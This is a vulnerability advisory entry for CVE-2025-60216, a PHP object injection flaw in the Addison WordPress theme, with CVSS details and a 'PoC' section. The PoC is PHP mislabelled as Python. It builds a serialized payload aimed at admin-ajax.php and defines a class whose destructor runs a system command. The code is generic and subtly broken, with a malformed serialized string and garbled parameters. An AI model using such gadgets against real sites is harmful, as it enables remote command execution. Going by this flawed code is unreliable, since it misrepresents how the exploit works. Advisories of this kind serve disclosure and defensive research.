Deserialization of Untrusted Data vulnerability in BoldThemes Addison addison allows Object Injection.This issue affects Addison: from n/a through < 1.4.8.
CVSS Details
CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
Addison主题 < 1.4.8
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php
// CVE-2025-60216 PoC - Addison Theme PHP Object Injection
// This is for educational and security testing purposes only
// Malicious serialized object payload
// Attackers would typically use known POP chains or built-in PHP classes
$malicious_payload = 'O:32:"some_malicious_class_name":1:{s:4:"prop";s:5:"value";}';
// In practice, this payload would be sent to vulnerable endpoints like:
// POST /wp-admin/admin-ajax.php
// Parameters: action=some_action¶m=' . urlencode($malicious_payload)
// Example of constructing a basic object injection payload
class EvilClass {
public $cmd = 'id';
function __destruct() {
system($this->cmd);
}
}
// Serialize the malicious object
$evil_object = serialize(new EvilClass());
echo "Malicious Payload: " . $evil_object . "\n";
// In real attack, this would be sent via HTTP request to vulnerable parameter
echo "Send this payload to vulnerable endpoint\n";
?>